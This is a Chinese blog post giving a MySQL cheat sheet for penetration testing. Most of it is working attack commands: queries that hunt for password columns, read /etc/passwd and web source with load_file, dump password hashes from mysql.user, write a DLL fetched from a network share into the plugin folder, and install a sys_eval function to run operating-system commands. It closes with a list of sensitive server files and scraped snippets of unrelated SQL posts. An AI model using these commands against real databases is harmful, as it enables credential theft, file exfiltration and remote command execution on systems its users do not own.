滲透中用到的sql語句 mysql篇

2021-09-26 08:33:28 字數 1755 閱讀 3938

# 找到含有密碼欄位的表


select table_name,column_name from information_schema.columns where column_name like '%pwd%' or column_name like '%passw%'


#找含有特定內容的表名


select table_name from information_schema.tables where table_schema='dbname' and table_name like '%use%'; 


# mysql 5.0.67開始,udf庫必須包含在plugin資料夾中,如果為空就不受限制


select @@plugin_dir


select @@version


select @@datadir


select @@tmpdir


#讀取檔案


select load_file('/etc/passwd')


select length(load_file('/var/www/html/index.php'))


後面附比較重要的檔案


#有的注入方式讀取很慢,可以唯讀一部分


#讀取第3個'documentroot後面的內容


#獲取mysql的賬號口令hash


select host,user,password,grant_priv,super_priv from mysql.user


#正在執行的操作 相當於show processlist


select * from information_schema.processlist


#mysql寫檔案


select load_file('\\\\192.168.0.19\\network\\lib_mysqludf_sys_64.dll') into dumpfile "d:\\mysql\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll";


select 0x4d5a900003000***xx into dumpfile '***.dll'


select '***x' into file 'xx.php'


#mysql udf


create function sys_eval returns string soname 'udf.dll'; // 安裝udf


select * from mysql.func where name = 'sys_eval'; // 驗證 


drop function sys_eval;


select sys_eval('dir');


/etc/issue 系統版本


/etc/sysconfig/network-scripts/ifcfg-eth0 可能有ip


/etc/passwd 密碼hash


/etc/sysconfig/iptables 防火牆規則


/etc/httpd/conf/httpd.conf http配置


/etc/crontab 計畫任務

記錄學習中用到的sql語句

1 根據一張表更新另一張表的資料update t table t1 set a t2.a,b t2.b from t table t2 where t1.name t2.name2 批量更新 mybatis批量更新 update mydata table when id then where id ...

mysql中用到的一些sql語句

檢視資料庫預設配置資訊 show variables 檢視mysql資料庫編碼方式 show variables like character set database 檢視資料庫裡表的編碼方式,同時還能看到該錶使用的儲存引擎資訊 show create table char test 修改資料庫編...

工作中用到的SQL

alter table tbmoudule drop column imouduleid 刪除列 mysql select coalesce col,0 value col,0 from tbl 為null賦預設值 db2 alter table sjpt sfsl add column flag ...